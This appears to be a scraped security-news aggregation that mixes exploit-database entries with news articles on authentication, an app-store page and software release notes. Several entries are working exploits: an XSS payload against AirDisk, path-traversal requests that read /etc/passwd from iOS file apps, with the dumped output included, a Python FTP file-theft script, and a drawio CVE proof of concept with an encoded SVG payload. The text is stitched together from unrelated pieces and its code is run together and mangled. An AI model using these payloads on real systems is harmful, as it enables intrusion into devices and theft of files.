AirDisk version 7.5.5 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: AirDisk 7.5.5 File Manager Stored XSS# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://apps.apple.com/us/developer/felix-yew/id505904424# Software Link:https://apps.apple.com/us/app/airdisk-file-manager/id566530748# Version: 7.5.5# Tested on: iPhone ios 15.61/ Starting the server ( File Transfer > Wi-fi File Transfer )2/ Go to browser3/ Enter the address showing on app eg: http://192.168.1.187:80804/ Create a folder with the name: rose'"><img src=xonerror=alert(document.location)>5/ Refresh.

AirDisk 7.5.5 Cross Site Scripting

@Drive version 2.8 suffers from a local file inclusion vulnerability.

    # Exploit Title: @Drive 2.8  Local File inclusion# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://evolutive.co/# Software Link: https://apps.apple.com/us/app/drive/id578982909# Version: 2.8# Tested on: iPhone ios 15.6GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.1.187User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept: */*Referer: http://192.168.1.187/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close--------HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: 213Accept-Ranges: bytesDate: Thu, 08 Sep 2022 14:26:16 GMT### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost

@Drive 2.8 Local File Inclusion

Microsoft moves ahead with a plan to sunset basic authentication, and other providers are moving — or have moved — to requiring more secure authentication as well. Is your company ready?

Microsoft and major cloud providers are starting to take steps to move their business customers toward more secure forms of authentication and the elimination of basic security weaknesses — such as using usernames and passwords over unencrypted channels to access cloud services.

Microsoft, for example, will remove the ability to use basic authentication for its Exchange Online service starting Oct. 1, requiring that its customers use token-based authentication instead. Google meanwhile has auto-enrolled 150 million people in its two-step verification process, and online cloud provider Rackspace plans to turn off cleartext email protocols by the end of the year.

The deadlines are a warning to companies that efforts to secure their access to cloud services can no longer be put off, says Pieter Arntz, malware intelligence researcher at Malwarebytes, who penned a recent blog post highlighting the coming deadline for Microsoft Exchange Online users.

"I think the balance is shifting to the point where they feel they can convince users that the extra security is in their best interest, while trying to offer solutions that are still relatively easy to use," he says. "Microsoft is often a trendsetter and announced these plans years ago, but you will still find organizations straggling and struggling to take the appropriate measures."

**Identity-Related Breaches on the Rise**

While some security-conscious companies have taken the initiative to secure access to cloud services, others have to be prodded — something that cloud providers, such as Microsoft, are increasingly willing to do, especially as companies struggle with more identity-related breaches. In 2022, 84% of companies suffered an identity-related breach, up from 79% in the previous two years, according to the Identity Defined Security Alliance's "2022 Trends in Securing Digital Identities" report.

Turning off basic forms of authentication is a simple way to block attackers, which are increasingly using credential stuffing and other mass access attempts as a first step to compromising victims. Companies with weak authentication leave themselves open to brute-force attacks, abuse of reused passwords, credentials stolen through phishing, and hijacked sessions.

And once attackers have gained access to corporate email services, they can exfiltrate sensitive information or conduct damaging attacks, such as business email compromise (BEC) and ransomware attacks, says Igal Gofman, head of research for Ermetic, a provider of identity security for cloud services.

"The use of weak authentication protocols, especially in the cloud, can be very dangerous and lead to major data leaks," he says. "Nation-states and cybercriminals are constantly abusing weak authentication protocols by executing a variety of different brute-force attacks against cloud services."

The benefits of shoring up the security of authentication can have immediate benefits. Google found that auto-enrolling people in its two-step verification process resulted in a 50% decrease in account compromises. A significant portion of companies that suffered a breach (43%) believe that having multifactor authentication could have stopped the attackers, according to the IDSA's "2022 Trends in Securing Digital Identities" report.

**Edging Toward Zero-Trust Architectures**

In addition, cloud and zero-trust initiatives have driven the pursuit of more secure identities, with more than half of companies investing in identity security as part of those initiatives, according to the IDSA's Technical Working Group, in an email to Dark Reading.

For many companies, the move away from simple authentication mechanisms that rely on merely a user's credentials has been spurred by ransomware and other threats, which have caused companies to look to minimizing their attack surface area and hardening defenses where they can, the IDSA's Technical Working Group wrote.

"As the majority of companies accelerate their zero-trust initiatives, they are also implementing stronger authentication where feasible — although, it is surprising that there are still some companies struggling with the basics, or \[that\] haven’t yet embraced zero trust, leaving them exposed," researchers there wrote.

**Obstacles to Secure Identities Remain**

Every major cloud provider offers multifactor authentication over secure channels and using secure tokens, such as OAuth 2.0. While turning on the feature may be simple, managing secure access can lead to an increase in work for the IT department — something for which businesses need to be ready, says Malwarebytes' Arntz.

Companies "sometimes fail when it comes to managing who has access to the service and which permissions they require," he says. "It is the extra amount of work for IT staff that comes with a higher authentication level — that is the bottleneck."

Researchers at the IDSA's Technical Working Group explained that legacy infrastructure is also a hurdle.  

"While Microsoft has been in the process of moving their authentication protocols forward for some time, the challenge of migrating and backward compatibility for legacy apps, protocols, and devices has delayed their adoption," they noted. "It's good news that the end is in sight for basic auth."

Consumer-focused services are also slow to adopt more secure approaches to authentication. While Google's move has improved security for many consumers, and Apple has enabled two-factor authentication for more than 95% of its users, for the most part consumers continue to only use multifactor authentication for a few services.

While almost two-thirds of companies (64%) have identified initiatives to secure digital identities as one of their top three priorities in 2022, only 12% of organizations have implemented multifactor authentication for their users, according to the IDSA's report. However, firms are looking to provide the option, with 29% of consumer-focused cloud providers currently implementing better authentication and 21% planning on it for the future.

Microsoft, Cloud Providers Move to Ban Basic Authentication

Cross-site Scripting (XSS) - Generic in GitHub repository jgraph/drawio prior to 20.3.0.

**Description**

The application allows the "use" tag to pass on dompurify, which leads to XSS. A strange behaviour bypasses the csp on app.diagrams.net when it has a "?" before the "#U" import.

**Proof of Concept**

POC diagram:

    <?xml version="1.0" encoding="UTF-8"?>
    <mxfile host="app.diagrams.netxyz" modified="2022-09-06T18:54:56.458Z" agent="5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" etag="xY3UKbpTp-KH--H4WcwT" version="20.2.8">
      <diagram id="4FUsL0c-RG27eG5O0xMg" name="Page-1">
        <mxGraphModel dx="1422" dy="664" grid="1" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="827" pageHeight="1169" math="0" shadow="0">
          <root>
            <mxCell id="0" />
            <mxCell id="1" parent="0" />
            <mxCell id="L7LsTOqxvLqq3sj4AYtF-1xyz" value="Text&lt;svg>&lt;use href=&#x22;data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x&#x22; />&lt;/svg>" style="text;html=1;strokeColor=none;fillColor=none;align=center;verticalAlign=middle;whiteSpace=wrap;rounded=0;" vertex="1" parent="1">
              <mxGeometry x="430" y="260" width="60" height="30" as="geometry" />
            </mxCell>
          </root>
        </mxGraphModel>
      </diagram>
    </mxfile>
    

Raw payload:

    <svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x" /></svg>
    

POC link

    https://app.diagrams.net/?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341
    https://viewer.diagrams.net/index.html?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341
    

**Impact**

XSS

**References**

*   https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#data-url-with-use-element-and-base64-encoded

CVE-2022-3148: XSS at app.diagrams.net in drawio

With iOS 16 and macOS Ventura, Apple is introducing passkeys—a more convenient and secure alternative to passwords.

For years, we’ve been promised the end of password-based logins. Now the reality of a passwordless future is taking a big leap forward, with the ability to ditch passwords being rolled out for millions of people. When Apple launches iOS 16 on September 12 and macOS Ventura next month, the software will include its password replacement, known as passkeys, for iPhones, iPads, and Macs.

Passkeys allow you to log in to apps and websites, or create new accounts, without having to create, memorize, or store a password. This passkey, which is made up of a cryptographic key pair, replaces your traditional password and is synced across iCloud’s Keychain. It has the potential to eliminate passwords and improve your online security, replacing the insecure passwords and bad habits you probably have now.

Apple’s rollout of passkeys is one of the largest implementations of password-free technology to date and builds on years of work by the FIDO Alliance, an industry group made up of tech’s biggest companies. Apple’s passkeys are its version of the standards created by the FIDO Alliance, meaning they will eventually work with Google, Microsoft, Meta, and Amazon’s systems.

What Is a Passkey?

Using a passkey is similar to using a password. On Apple’s devices, it’s built into the traditional password boxes that websites and apps use to get you to log in. Passkeys act as a unique digital key and can be created for each app or website you use. (The word “passkey” is also being used by Google and Microsoft, with FIDO calling them “multi-device FIDO credentials.”)

If you are new to an app or a website, there’s the potential that you can create a passkey instead of a password from the start. But for services where you already have an account, it’s likely you will need to log in to that existing account using your password and then create a passkey.

Apple’s demonstrations of the technology show a prompt appearing on your devices during the sign-in or account-creation phase. This box will ask whether you would like to “save a passkey” for the account you are using. At this stage, your device will prompt you to use Face ID, Touch ID, or another authentication method to create the passkey.

Once created, the passkey can be stored in iCloud’s Keychain and synced across multiple devices—meaning your passkeys will be available on your iPad and MacBook without any extra work. Passkeys work in Apple’s Safari web browser as well as on its devices. They can also be shared with nearby Apple devices using AirDrop.

As Apple’s passkeys are based on the wider passwordless standards created by the FIDO Alliance, there’s the potential that they can be stored elsewhere, too. For instance, password manager Dashlane has already announced its support for passkeys, claiming it is an “independent and universal solution agnostic of the device or platform.”

While Apple is launching passkeys with iOS 16 and macOS Ventura, there are several caveats to its rollout. First, you need to update your devices to the new operating system. Second is that apps and websites need to support the use of passkeys—they can do this by using the FIDO standards. Ahead of Apple’s updates, it isn’t clear which apps or websites are already supporting passkeys, although Apple first previewed the technology to developers at its developer conference in 2021.

How Do Apple’s Passkeys Work?

Under the hood, Apple’s passkeys are based on the Web Authentication API (WebAuthn), which was developed by the FIDO Alliance and World Wide Web Consortium (WC3). The passkeys themselves use public key cryptography to protect your accounts. As a result, a passkey isn’t something that can (easily) be typed.

When you create a passkey, a pair of related digital keys are created by your system. “These keys are generated by your devices, securely and uniquely, for every account,” Garrett Davidson, an engineer on Apple’s authentication experience team, said in a video about passkeys. One of these keys is public and stored on Apple’s servers, while the other key is a secret key and stays on your device at all times. “The server never learns what your private key is, and your devices keep it safe,” Davidson said.

Apple’s Killing the Password. Here’s Everything You Need to Know

WeDayCare B.V Ouderapp before v1.1.22 allows attackers to alter the ID value within intercepted calls to gain access to data of other parents and children.

Met de ‘Eigen & Wijzer ouderapp’ kijkt u mee met de belevenissen van uw kind(eren) bij Eigen&Wijzer Kinderopvang. U kunt foto’s bekijken, berichten van de groep en de locatie lezen en versturen en de ontwikkelingen van uw kind(eren) volgen. Het is via de app mogelijk om opvangdagen aan te vragen, te ruilen en de afwezigheid door te geven. U kunt tevens de facturen, jaaropgaven en andere documenten inzien.

Om gebruik te maken van deze App moet je kinderdagverblijf organisatie aangesloten zijn bij Wedaycare.com.

**Nieuw**

Met de WeDayCare App staan ouders direct in contact met het kinderdagverblijf. Blijf dagelijks op de hoogte van alle leuke momenten tijdens de dag op de opvang. Met de app kun je foto’s bekijken, dagelijks schriftje inzien en berichten sturen met de medewerkers van de groep. Daarnaast kun je ook extra opvang of ruildagen aanvragen en afwezigheid doorgeven.

Om gebruik te maken van deze App moet je kinderdagverblijf organisatie aangesloten zijn bij Wedaycare.com.

**Beoordelingen en recensies**

2,8 van 5

9 beoordelingen

**Prima app, kleine bug**

> Prima handige app. Snel communicatie met opvang, vrije dagen aanvraag etc werkt goed. Alleen bij reactie dat er nieuwe invoer in het dagboek is moet je 2x het dagboek openen voordat het bericht geladen wordt

**Verschrikkelijk app**

> Kan geen eens foto download en heb een iPhone 13 pro Max. Niet in de berichten of in het fotoalbum. Dat is het enige waarom ik de app heb. Zou 0 sterren geven als dat kon.

> Beste Nore,
> 
> Waarschijnlijk heb je geen toestemming gegeven dat de app foto's kan downloaden op je telefoon. Zou je anders de app willen verwijderen en opnieuw willen installeren? Hierna krijg je de vraag zodra je de eerste foto download om toestemming te geven voor het downloaden van foto's. We horen graag of het gelukt is. Zou je ons willen mailen op support@wedaycare.com. Bedankt

**Werkt super!**

> Erg fijn om zo op de hoogte gehouden te worden. App werkt goed!

> Fijn om te horen. Mocht je nog suggesties hebben horen wij het graag via support@wedaycare.com

**App-privacy**

De ontwikkelaar, Wedaycare B.V., heeft aangegeven dat volgens de toepassing van het privacybeleid van de app gegevens kunnen worden beheerd zoals hieronder staat beschreven. Ga voor meer informatie naar het privacybeleid van de ontwikkelaar.

**Er worden geen gegevens verzameld**

De ontwikkelaar verzamelt geen gegevens van deze app.

Toepassing van het privacybeleid kan variëren op basis van bijvoorbeeld de functies die je gebruikt of je leeftijd. Lees meer

**Informatie**

Provider

Wedaycare B.V.

Grootte

34,5 MB

Categorie

Onderwijs

Compatibiliteit

iPhone

Vereist iOS 12.0 of nieuwer.

iPad

Vereist iPadOS 12.0 of nieuwer.

iPod touch

Vereist iOS 12.0 of nieuwer.

Mac

Vereist een Mac met macOS 11.0 of nieuwer én Apple M1-chip of nieuwer.

Leeftijd

4+

Copyright

© WeDayCare

Prijs

Gratis

*   App-support
*   Privacybeleid

*   App-support
*   Privacybeleid

**Meer van deze ontwikkelaar**

**Suggesties voor jou**

CVE-2022-36539: ‎Eigen&Wijzer Ouderapp

FE File Explorer version 11.0.4 suffers from a local file inclusion vulnerability.

    # Exploit Title: FE File Explorer 11.0.4 Local File inclusion# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/fe-file-explorer-file-manager/id510282524# Version: 11.0.4# Tested on: iPhone ios 15.6from ftplib import FTPimport argparsehelp = " FE File Explorer Local File inclusion"parser = argparse.ArgumentParser(description=help)parser.add_argument("--target", help="Target IP", required=True)parser.add_argument("--file", help="File To Open eg: etc/passwd")args = parser.parse_args()ip = args.targetport = 2121 # Default Portfiles = args.fileftpConnection = FTP()ftpConnection.connect(host=ip, port=port)ftpConnection.login();def downloadFile():ftpConnection.cwd('/../../../../../../../../../../../../../../../../')        ftpConnection.retrbinary(f"RETR {files}", open('data.txt','wb').write)        ftpConnection.close()        file = open('data.txt', 'r')        print (f"[***] The contents of {files}\n")        print (file.read())downloadFile()

FE File Explorer 11.0.4 Local File Inclusion

FTPManager version 8.2 suffers from local file inclusion and directory traversal vulnerabilities.

    # Exploit Title: FTPManager 8.2 Local File inclusion# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186# Version: 8.2# Tested on: Ios 15.6GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.1.178:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close------------------HTTP/1.1 200 OKConnection: CloseServer: GCDWebUploaderContent-Type: application/octet-streamLast-Modified: Wed, 13 Jul 2022 10:35:46 GMTDate: Tue, 06 Sep 2022 03:05:05 GMTContent-Length: 2581Cache-Control: max-age=3600, publicEtag: 1152921500312311384/1657708546/0### User Database## This file is the authoritative user database.##nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/falseroot:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/shmobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/shdaemon:*:1:1:System Services:/var/root:/usr/bin/false_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false_securityd:*:64:64:securityd:/var/empty:/usr/bin/false_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false_ondemand:*:249:249:On Demand ResourceDaemon:/var/db/ondemand:/usr/bin/false_findmydevice:*:254:254:Find My DeviceDaemon:/var/db/findmydevice:/usr/bin/false_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false_diskimagesiod:*:271:271:DiskImages IODaemon:/var/db/diskimagesiod:/usr/bin/false_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false_accessoryupdater:*:278:278:Accessory UpdateDaemon:/var/db/accessoryupdater:/usr/bin/false_knowledgegraphd:*:279:279:Knowledge GraphDaemon:/var/db/knowledgegraphd:/usr/bin/false_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false_trustd:*:282:282:trustd:/var/empty:/usr/bin/false_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false---------------------------------------------------# Exploit Title: FTPManager 8.2 Directory Traversal (ftp)# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186# Version: 8.2# Tested on: ios 15.6#ftp 192.168.1.178 2121Connected to 192.168.1.178.220 ---------- Welcome to FTPManager ----------Name (192.168.1.178:chokri):230 User chokri logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd /../../../../../../../../../../../../../../../../250 OK. Current directory is/../../../../../../../../../../../../../../../../ftp> ls200 PORT command successful.150 Accepted data connectiontotal 10drwxr-xr-x     0 root wheel        256 Jan 01 1970 usrdrwxr-xr-x     0 root wheel        128 Jan 01 1970 bindrwxr-xr-x     0 root wheel        576 Jan 01 1970 sbindrwxr-xr-x     0 root wheel        160 Jan 01 1970 Systemdrwxr-xr-x     0 root wheel        672 Jan 01 1970 Librarydrwxr-xr-x     0 root wheel        224 Jan 01 1970 privatedrwxr-xr-x     0 root wheel       1132 Jan 01 1970 devdrwxr-xr-x     0 root admin       3968 Jan 01 1970 Applicationsdrwxr-xr-x     0 root admin         64 Jan 01 1970 Developerdrwxr-xr-x     0 root admin         64 Jan 01 1970 coresWARNING! 10 bare linefeeds received in ASCII modeFile may not have transferred correctly.226 Transfer complete.ftp> cd private/etc250 OK. Current directory is/../../../../../../../../../../../../../../../../private/etcftp> get passwdlocal: passwd remote: passwd200 PORT command successful.150 Opening BINARY mode data connection for 'passwd'.226 Transfer complete.2581 bytes received in 0.00 secs (11.5020 MB/s)ftp> get serviceslocal: services remote: services200 PORT command successful.150 Opening BINARY mode data connection for 'services'.226 Transfer complete.677977 bytes received in 0.17 secs (3.8257 MB/s)---------------------------------------------------# Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186# Version: 8.2# Tested on: ios 15.6from ftplib import FTPimport argparsehelp = " FTPManager 8.2 Local File inclusion by chokri hammedi"parser = argparse.ArgumentParser(description=help)parser.add_argument("--target", help="Target IP", required=True)parser.add_argument("--file", help="File To Open eg: etc/passwd")args = parser.parse_args()ip = args.targetport = 2121 # Default Portfiles = args.fileftpConnection = FTP()ftpConnection.connect(host=ip, port=port)ftpConnection.login();def downloadFile():ftpConnection.cwd('/../../../../../../../../../../../../../../../../')        ftpConnection.retrbinary(f"RETR {files}", open('data.txt','wb').write)        ftpConnection.close()        file = open('data.txt', 'r')        print (f"[***] The contents of {files}\n")        print (file.read())downloadFile()

FTPManager 8.2 Local File Inclusion / Directory Traversal

The Blink1Control2 application <= 2.2.7 uses weak password encryption and an insecure method of storage.

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.9-mac-x64.dmg - Mac Intel DMG disk installer
    *   Blink1Control2-2.2.9-mac-x64.zip - Mac Intel zip file
    *   Blink1Control2-2.2.9-mac-arm64.dmg - Mac Apple Silicon DMG disk installer
    *   Blink1Control2-2.2.9-mac-arm64.zip - Mac Apple Silicon zip file
*   Windows
    
    *   Blink1Control2-2.2.9-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.9-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.9-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux x86
    
    *   Blink1Control2-2.2.9-linux.tar.gz - Linux x86 64-bit tarball
    *   Blink1Control2-2.2.9-linux-amd64.deb - Linux x86 64-bit Debian package
*   Raspberry Pi
    
    *   Blink1Control2-2.2.9-linux-armv7l.deb - Linux RaspberryPi Arm7l 64-bit Debian package

Fixes in this release:

*   Upgrade encryption used in Event Rules with passwords (GMAIL, IMAP, etc) #175
*   Improve HTTP API server error handling when presented with bad query params #174
*   Turn off HTTP API endpoint /blink1/inputs for increased security #174
*   Allow "instant" color changes in Color Picker and Big Buttons with fadeTime = 0.0 seconds, min was 0.1 seconds #173
*   Show HTTP API accesses in Recent Events log #172
*   Allow IFTTT Event Source to follow redirects for HTTP -> HTTPS conversion #171
*   Add HTTP API endpoint /blink1/enumerate to cause USB rescan #170
*   HTTP API endpoint /blink1/patterns now show per-pattern repeats and playing attributes #169
*   Some blink(1) mk2 devices that were not detected in 2.2.8 now are #168, #166

**Full Changelog**: v2.2.8...v2.2.9

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.8-mac-x64.dmg - Mac Intel DMG disk installer
    *   Blink1Control2-2.2.8-mac-x64.zip - Mac Intel zip file
    *   Blink1Control2-2.2.8-mac-arm64.dmg - Mac Apple Silicon DMG disk installer
    *   Blink1Control2-2.2.8-mac-arm64.zip - Mac Apple Silicon zip file
*   Windows
    
    *   Blink1Control2-2.2.8-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.8-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.8-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux x86
    
    *   Blink1Control2-2.2.8-linux.tar.gz - Linux x86 64-bit tarball
    *   Blink1Control2-2.2.8-linux-amd64.deb - Linux x86 64-bit Debian package
*   Raspberry Pi
    
    *   Blink1Control2-2.2.8-linux-armv7l.deb - Linux RaspberryPi Arm7l 64-bit Debian package

Fixes in this release:

*   Ubuntu 22 crash #166
*   Cannot control multiple blink(1) devices correctly #168

Other changes:

*   BigButton assigned blink(1) device radio menu shows default selection better
*   blink(1) serial number selection works correctly for certain blink(1)s w/ serial numbers w/ lower case hex digits
*   Update Electron 12 -> 18
*   Update build tools: webpack 3.3 -> 4.1, babel 7.10 -> 7.16

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.7-mac-x64.dmg - Mac Intel DMG disk installer
    *   Blink1Control2-2.2.7-mac-x64.zip - Mac Intel zip file
    *   Blink1Control2-2.2.7-mac-arm64.dmg - Mac Apple Silicon DMG disk installer
    *   Blink1Control2-2.2.7-mac-arm64.zip - Mac Apple Silicon zip file
*   Windows
    
    *   Blink1Control2-2.2.7-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.7-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.7-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux x86
    
    *   Blink1Control2-2.2.7-linux.tar.gz - Linux x86 64-bit tarball
    *   Blink1Control2-2.2.7-linux-amd64.deb - Linux x86 64-bit Debian package
*   Raspberry Pi
    
    *   Blink1Control2-2.2.7-linux-armv7l.deb - Linux RaspberryPi Arm7l 64-bit Debian package

Fixes in this release

*   Fix Script and File forms to allow file or script selection in some instances, #161
*   Disallow multiple instances (again), #165

Fix Script and File forms

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.5-mac-x64.dmg - Mac Intel DMG disk installer
    *   Blink1Control2-2.2.5-mac-x64.zip - Mac Intel zip file
*   Windows
    
    *   Blink1Control2-2.2.5-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.5-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.5-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.5-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.5-linux-amd64.deb - Linux x86 64-bit Debian package

Fixes:

*   Fix "cert expired" error by updating electron from 8.3.4 to 12.2.2 to Lets Encrypt X3 DST cert

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.4-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.4-mac.zip - Mac zip file
*   Windows
    
    *   Blink1Control2-2.2.4-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.4-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.4-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.4-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.4-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.4-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

Changes/Fixes in this release:

*   Issue #143: Alarms set for 12:xx am or 12:xx pm fire at the wrong time
*   Issue #142: Add /blink1/lastColor API endpoint
*   Issue #141: API query args to specify blink1\_id not congruent
*   Issue #106 and others: "Start at login" not working on Windows (hopefully fixed now)

Also, updated to Electron v8, updated node-hid and node-blink1, updated Mac and Windows app signing process.

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.3-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.3-mac.zip - Mac zip file
*   Windows
    
    *   Blink1Control2-2.2.3-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.3-win-x64.zip - Windows "portable" zip (64-bit)
    *   Blink1Control2-2.2.3-win-ia32.zip - Windows "portable" zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.3-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.3-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.3-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

Changes/Fixes in this release:

*   Issue #116: Crash when using non-allowed accelerator key for "Reset Alerts"
*   Issue #115: blink(1) flashing gets slower when main window is minimized
*   Update node-hid & node-blink1 to latest
*   Add ability to set "nightlight mode" aka "no-computer mode" in Prefs page :

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.2-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.2-mac.zip - Mac zip file
*   Windows
    
    *   Blink1Control2-2.2.2-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.2-win-x64.zip - Windows zip (64-bit)
    *   Blink1Control2-2.2.2-win-ia32.zip - Windows zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.2-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.2-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.2-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

Changes//Fixes in this release:

*   Issue #98 – can't right-click BigButtons, add new UI element for non-right-click folk
*   Issue #106 – error on startup in some situations
*   Issue #108 – not detecting some Skype events
*   Issue #109 – allow CORS requests to HTTP API server
*   Issue #114 – IMAP "use SSL" button was broken
*   package updates
    *   Electron v3 -> v4
    *   Babel v6 -> v7
    *   Webpack v1 -> v4

Blink1Contro2 v2.2.1

Download the preferred version for your platform:

*   Mac
    
    *   Blink1Control2-2.2.1-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.1-mac.zip - Mac zip file
*   Windows
    
